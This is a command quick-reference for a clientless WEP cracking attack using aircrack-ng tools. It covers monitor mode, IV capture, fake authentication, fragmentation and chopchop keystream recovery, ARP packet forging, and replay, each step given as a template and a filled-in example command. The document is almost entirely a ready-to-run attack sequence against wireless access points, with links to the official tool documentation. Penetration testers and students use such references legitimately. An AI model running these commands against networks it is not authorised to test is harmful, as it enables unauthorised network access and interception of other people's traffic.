Clientless WEP

Table of Contents

  1. Setup
    1. Monitor Mode
    2. Packet Capture
    3. Fake Authentication
  2. Fragmentation
  3. Korek Chop Chop
  4. Packet Forge
  5. ARP replay
  6. Modified Packet Replay

This is intended to be a quick reference; for more detailed information, please refer to the aircrack-ng documentation.

Setup

Monitor Mode [1]

List available interfaces

sudo airmon-ng

pseudo

sudo airmon-ng start <interface> <channel>

example

sudo airmon-ng start wlan0 6

Packet Capture [2]

pseudo

sudo airodump-ng --channel <channel_number> --bssid <AP_BSSID> -w <file> --ivs <interface>

example

sudo airodump-ng --channel 6 --bssid 00:AA:11:BB:22:CC -w test --ivs wlan0mon

Fake Authentication [3]

pseudo

sudo aireplay-ng --fakeauth 20 -a <AP_BSSID> -h <source_BSSID> <interface>

example

sudo aireplay-ng --fakeauth 20 -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon

Fragmentation [4]

pseudo

sudo aireplay-ng --fragment -a <AP_BSSID> -h <source_BSSID> <interface>

example

sudo aireplay-ng --fragment -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon

Korek Chop Chop [5]

pseudo

sudo aireplay-ng --chopchop -b <AP_BSSID> -h <source_BSSID> <interface>

example

sudo aireplay-ng --chopchop -b 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon

Packet Forge [6]

pseudo

packetforge-ng -0 -a <AP_BSSID> -h <source_BSSID> -k <AP_IPAddress> -l <source_IPAddress> -y <xor_file> -w <output_file>

example

packetforge-ng -0 -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC -k 192.168.1.1 -l 192.168.1.2 -y replay_dec-1002-153255.xor -w arp-request

ARP replay [7]

pseudo

sudo aireplay-ng --interactive -r <packet_file> <interface>

example

sudo aireplay-ng --interactive -r arp-request wlan0mon

Modified Packet Replay [8]

pseudo

sudo aireplay-ng --interactive -b <AP_BSSID> -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 <interface>

example

sudo aireplay-ng --interactive -b 00:AA:11:BB:22:CC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 wlan0mon

Footnotes

1 https://www.aircrack-ng.org/doku.php?id=airmon-ng

2 https://www.aircrack-ng.org/doku.php?id=airodump-ng

3 https://www.aircrack-ng.org/doku.php?id=fake_authentication

4 https://www.aircrack-ng.org/doku.php?id=fragmentation

5 https://www.aircrack-ng.org/doku.php?id=korek_chopchop

6 https://www.aircrack-ng.org/doku.php?id=packetforge-ng

7 https://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

8 https://www.aircrack-ng.org/doku.php?id=interactive_packet_replay
